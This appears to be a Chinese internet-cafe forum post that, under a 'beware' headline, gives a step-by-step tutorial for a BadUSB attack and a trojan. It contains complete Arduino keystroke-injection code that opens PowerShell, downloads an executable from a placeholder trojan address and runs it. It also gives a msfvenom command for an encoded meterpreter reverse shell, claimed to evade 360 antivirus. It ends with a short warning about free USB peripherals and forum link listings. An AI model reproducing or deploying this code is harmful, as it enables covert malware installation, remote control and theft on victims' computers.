(网吧高科技木马,请注意防范)系统安全-BadUsb代码以及木马远控的制作(可绕过360)
漏洞背景是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布。BadUsb号称是世界上最邪恶的USB外设。笔者使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作….硬件准备这里我们使用的是:BS Micro pro micro leonardo Arduino 开发板(某宝里面买的)硬件代码#include <Keyboard.h>void setup() {//初始化Keyboard.begin();//开始键盘通讯delay(1000);//延时Keyboard.press(KEY_LEFT_GUI);//win键delay(200);Keyboard.press(‘r’);//r键delay(300);Keyboard.release(KEY_LEFT_GUI);//释放win 键Keyboard.release(‘r’);//释放R键Keyboard.press(KEY_CAPS_LOCK);//切换大小写,绕过输入法Keyboard.release(KEY_CAPS_LOCK);Keyboard.println(“cmd “);delay(200);Keyboard.press(KEY_RETURN);//按下回车键delay(200);Keyboard.release(KEY_RETURN);//按下回车键delay(500);Keyboard.println(“powershell “);Keyboard.press(KEY_RETURN);//按下回车键delay(200);Keyboard.release(KEY_RETURN);//按下回车键delay(500);Keyboard.println(“$clnt = new-object System.Net.WebClient; “);Keyboard.press(KEY_RETURN);//按下回车键delay(200);Keyboard.release(KEY_RETURN);//按下回车键delay(500);Keyboard.println(“$url= ‘**********木马地址******’; “);Keyboard.press(KEY_RETURN);//按下回车键delay(200);Keyboard.release(KEY_RETURN);//按下回车键delay(500);Keyboard.println(“$file = ‘ D:\\server.exe’; “);Keyboard.press(KEY_RETURN);//按下回车键delay(200);Keyboard.release(KEY_RETURN);//按下回车键delay(500);Keyboard.println(“$clnt.DownloadFile($url,$file); “);Keyboard.press(KEY_RETURN);//按下回车键delay(200);Keyboard.release(KEY_RETURN);//按下回车键delay(500);Keyboard.println(“START D:\\server.exe “);Keyboard.press(KEY_RETURN);delay(500);Keyboard.release(KEY_RETURN);delay(500);Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
注:我们通过分步进行cmd批处理里面的powershell 命令,这样可以绕过杀毒软件的拦截。
木马地址:是我们已经将做好的木马放在外网服务器的地址,对于木马的制作我下面会讲
木马制作(可绕过360检测)使用工具:kali系统、vc++6.0
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ lhost=192.168.1.157 lport=5555 -f c -o /root/Desktop/sha.c
e参数指定编码方式,i参数指定编码次数,b参数去除指定代码,一般是空代码或者错误代码, lhost本机地址,lport监听的端口,-f指定生成格式,-o指定输出路径。
执行上述代码之后,会生成sha.c,名字可以随意,打开sha.c文件,其中代码为:再将代码用vc++做成软件(注意要c语言的头文件,c语言基础)即可…亲自检测可以绕过360检测
目标机运行木马程序程序,就能拿到shell补充arduino按键代码
delay(5000);//延时毫秒
Keyboard.begin(); //开始键盘通讯Keyboard.end(); //结束键盘通讯Keyboard.press(); //按下键盘按键 如果是非特殊按键如 数字、字母按键用单引号括起来Keyboard.release(); //释放键盘按键Keyboard.println(“”); //输入字符串使用双引号括起来
Mouse.begin();//鼠标事件开始Mouse.click();//鼠标单击Mouse.end();//鼠标事件结束Mouse.move();//鼠标移动(x,y)Mouse.press();//鼠标按下Mouse.release();//鼠标松开Mouse.isPressed();//
KEY_LEFT_CTRLKEY_LEFT_SHIFTKEY_LEFT_ALTKEY_LEFT_GUI //win键KEY_RIGHT_CTRLKEY_RIGHT_SHIFTKEY_RIGHT_ALTKEY_RIGHT_GUIKEY_UP_ARROWKEY_DOWN_ARROWKEY_LEFT_ARROWKEY_RIGHT_ARROWKEY_BACKSPACEKEY_TABKEY_RETURN//回车键KEY_ESCKEY_INSERTKEY_DELETEKEY_PAGE_UPKEY_PAGE_DOWNKEY_HOMEKEY_ENDKEY_CAPS_LOCKKEY_F1KEY_F2KEY_F3KEY_F4KEY_F5KEY_F6KEY_F7KEY_F8KEY_F9KEY_F10KEY_F11KEY_F12
《以下内容来自朋友圈,好像最先发现的,是独白,文字解释来自晓石电脑》感谢两位大佬!
全新盗号、挖矿、广告方式,USB口,延长线,手机充电线,键盘、鼠标,这年头,不动脑筋是活不下去了,在这提醒广大客户,免费的键鼠,手机充电线还是别要,天下没有免费的午餐更多精彩:解决魔兽世界,暴雪平台,AGENT进程睡眠问题工具Radmin/影子防黑伴侣!
客户机广告?盗号?服务器被黑?收集了一年的BING背景作为新年礼物分享给大家吧
删除某些快捷方式的小工具V3,多配置版 BY华夏网盟
网咖特色铺助小工具,数字振动,亮度,鼠标,音量,色调,V3。by华夏网盟
【V2】CPU/显卡/信息修改工具!支持有盘/无盘/win7/win10/所有无盘/本地驱动/pnp/
QQ网吧MAC,机器号提取工具(雲无盘版)网吧全套视屏教程,从0基础到有盘无盘教程!整个网吧的开业到正常营业!
【VIP软件】网吧硬件监控软件,温度/风扇/CPU/显卡/网卡速率 by 华夏网盟
VIP教程/解决网吧叫卡,玩游戏卡顿,掉FPS等问题系列教程|2019VIP教程更新
自动添加360极速浏览器到桌面,并且设置主页,设置默认
解决STEAM在ATI显卡在PNP下启动慢的问题!
有效防止STEAM盗号!服务器被黑入侵检测工具!5.1号更新盗号病毒的简单分析并拿到后台公司数据管理软件V9.0.5《网络版》发布_By:华夏网盟
【vip软件】超强结束进程工具BY华夏网盟
《Apex英雄》报错率最小的安装方式
页:
[1]